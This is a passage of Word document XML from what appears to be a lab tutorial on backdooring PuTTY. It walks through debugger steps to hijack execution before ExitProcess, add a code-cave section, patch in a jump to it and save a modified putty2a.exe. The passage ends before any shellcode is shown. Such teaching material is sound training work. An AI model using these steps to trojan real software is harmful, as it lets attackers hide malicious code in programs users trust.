        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8FD703" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="73BE745C" wp14:editId="6C82E741">
            <wp:extent cx="5581650" cy="4572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581650" cy="4572000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18386070" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You should see in the status bar something similar to the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D87411" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="74EE8FF0" wp14:editId="7F14D69B">
            <wp:extent cx="2047875" cy="495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047875" cy="495300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE97FAD" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D3DEF8" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Go to the breakpoints window. You should see something similar to the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461DC91A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5D79F237" wp14:editId="2A4E1634">
            <wp:extent cx="4733925" cy="1714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733925" cy="1714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB8D1B1" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70517F0A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>The next step is to run the application (putty2.exe in our case). Therefore you know how to do that, don’t you? :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018399B3" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AC0D45" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Once the application started, go and hit the X button to exit the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5385CE1B" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F40D66F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>What happened and why? Explain please….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F42C9" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1861C00F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Up to this point, what we need to do is find what is the execution flow that will lead to the call of ExitProcess. This is a trial and error approach since we need to monitor and trace those roll backs which are on the program’s stack and see which one of those leads to the call of ExitProcess. For that reason and in order to speed up the process, I have made this simpler for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7911CB46" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>While the code has reached our breakpoint, go up in the code for a couple of lines. You should see something similar to the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB035BD" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="10B683CA" wp14:editId="44EA8704">
            <wp:extent cx="5095875" cy="12573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095875" cy="1257300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A7080" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8A9400" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WONDERFUL !!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C91FF" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2959E736" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>So the code we will be replacing is going to be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7907DAF4" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">FF75 08        PUSH DWORD PTR SS:[EBP+8]                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:tab/>
        <w:t>; /Arg1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67C8C3" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t xml:space="preserve">E8 60FFFFFF    CALL putty2.01409E1C                     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:tab/>
        <w:t>; \putty2.013F9E1C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518DC013" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460E6D92" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remember this code, we will come back to it later. Also could add a breakpoint to easily locate later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E5D9F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="1AAA5F9A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="15224B53" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="5FB0615A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="0C93AE5D" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="1894D225" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="204E9D4D" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="02F54DDF" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="17B90EA6" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_pyn4ltszlht9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Adding our Shellcode to the Code Cave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173B759" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Go to the Memory map” window and locate the .beef section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D8EEC" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="744A8BDA" wp14:editId="6AE41D82">
            <wp:extent cx="5943600" cy="30353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3035300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D70D96A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The address of this cave code in my case is: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t>014A0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D517DA5" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4DD705" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4C4CF30C" wp14:editId="3F14DFB6">
            <wp:extent cx="3990975" cy="1333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990975" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="673E9782" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Note: this will be different in your case, so make sure you write it down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67473502" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C98550" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now go back to the location we just found before in the previous step (location of code to be replaced). Code below is my case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0C2402" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>01409EB4  |&gt; FF75 08        PUSH DWORD PTR SS:[EBP+8]                ; /Arg1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE2151" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>01409EB7  |. E8 60FFFFFF    CALL putty2.01409E1C                     ; \putty2.013F9E1C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE0E9EE" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687B3091" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Press the space bar and replace the first line with a jump to your cave code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59031419" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t>JMP 014A0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6626F2B9" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3A95C5" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a breakpoint to this newly modified location, just to easily go back to it. BTW, we could also use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sign to go backwards and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to go forward if you want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05909C5C" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17CB1738" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Right click on the code and select “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Follow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65466FBF" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A39D943" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Did you reach the location of your cave code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7850C83D" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Go back to the code modified and highlight it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EB163" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Right-click and then go to “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Copy to executable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A880C18" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2044A221" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Right-click on the new window and save the new exe as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>putty2a.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C8251" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF004FC" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
